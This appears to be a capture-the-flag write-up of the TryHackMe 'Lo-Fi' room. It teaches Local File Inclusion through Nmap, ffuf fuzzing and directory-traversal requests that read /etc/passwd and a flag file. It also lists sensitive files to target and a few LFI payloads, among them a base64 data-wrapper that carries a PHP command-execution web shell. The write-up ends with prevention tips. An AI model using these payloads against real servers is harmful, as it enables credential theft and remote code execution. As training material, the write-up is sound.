Lo-Fi Writeup

Overview

Want to hear some lo-fi beats, to relax or study to? You've got you covered! This TryHackMe room introduces Local File Inclusion (LFI) vulnerabilities and demonstrates how they can be exploited to read sensitive files on a web server.

Initial Enumeration

We start with the standard Nmap scan to identify open ports and services on the target system.

nmap -A -T4 lo-fi.thm

The scan reveals ports and services running on the target. We'll focus on the web server for this challenge.

Web Application Discovery

Clicking on one of the links from the scan results leads us to the main website:

http://lo-fi.thm/

Upon examining the URL structure, we notice there's a page parameter that handles page redirection:

http://lo-fi.thm/?page=

This looks like a potential entry point for Local File Inclusion (LFI) attacks. There's also a filter in place that might restrict our access to absolute paths.

LFI Vulnerability Testing

To test for LFI vulnerabilities, we use ffuf (Fuzz Faster U Fool) with a wordlist specifically designed for LFI attacks:

ffuf -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://lo-fi.thm/?page=FUZZ" -fl 124

The scan reveals several successful hits where the application responds differently, indicating that LFI might be possible.

Exploiting the LFI

Let's test the simplest case first - attempting to include the system's passwd file:

http://lo-fi.thm/?page=../../../etc/passwd

Success! The page displays the contents of /etc/passwd, confirming the LFI vulnerability exists. This means we can read files from the server's filesystem by using directory traversal techniques.

Flag Capture

Now that we know LFI works, let's try to include the flag file mentioned in the challenge description. The flag should be located in the root directory of the system:

http://lo-fi.thm/?page=../../../flag.txt

Perfect! We have a hit. The page now displays the contents of the flag file:

Climbing the Filesystem

As the challenge title suggests, we need to "climb the filesystem" to find additional flags or interesting files. Using the LFI vulnerability, we can explore various directories:

• /etc/passwd - System user information
• /etc/shadow - Hashed passwords (if accessible)
• /var/log/apache2/access.log - Web server access logs
• /proc/version - System version information
• /home/* - User home directories

What is LFI?

Local File Inclusion (LFI) is a web vulnerability that allows an attacker to include files from the server's filesystem in the web application's response. This happens when user input is not properly sanitized and is directly used to include files.

Common LFI payloads include:

• ../../../etc/passwd - Directory traversal
• php://filter/convert.base64-encode/resource=../../../etc/passwd - PHP filter wrapper
• data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= - Data wrapper (PHP code execution)

Prevention Techniques

• Input Validation: Sanitize and validate all user inputs
• Whitelist Approach: Only allow inclusion of files from a predefined list
• Path Sanitization: Remove dangerous characters like "../" from user input
• Use Frameworks: Modern web frameworks handle file inclusion securely
• Least Privilege: Run web applications with minimal permissions

Lessons Learned

• LFI vulnerabilities can lead to sensitive information disclosure
• Directory traversal using "../" sequences is a common attack technique
• Web application parameters should always be validated
• Fuzzing tools like ffuf are essential for vulnerability discovery
• Wordlists like LFI-Jhaddix.txt are valuable for systematic testing
• Understanding file system structure is crucial for penetration testing
• Flags in CTF challenges are often stored in predictable locations

Tools Used

• Nmap - Network scanning and service discovery
• ffuf - Web fuzzing and directory/file enumeration
• Browser - Manual vulnerability testing and navigation
• LFI-Jhaddix.txt wordlist - Specialized wordlist for LFI testing
• Terminal - Command execution and result analysis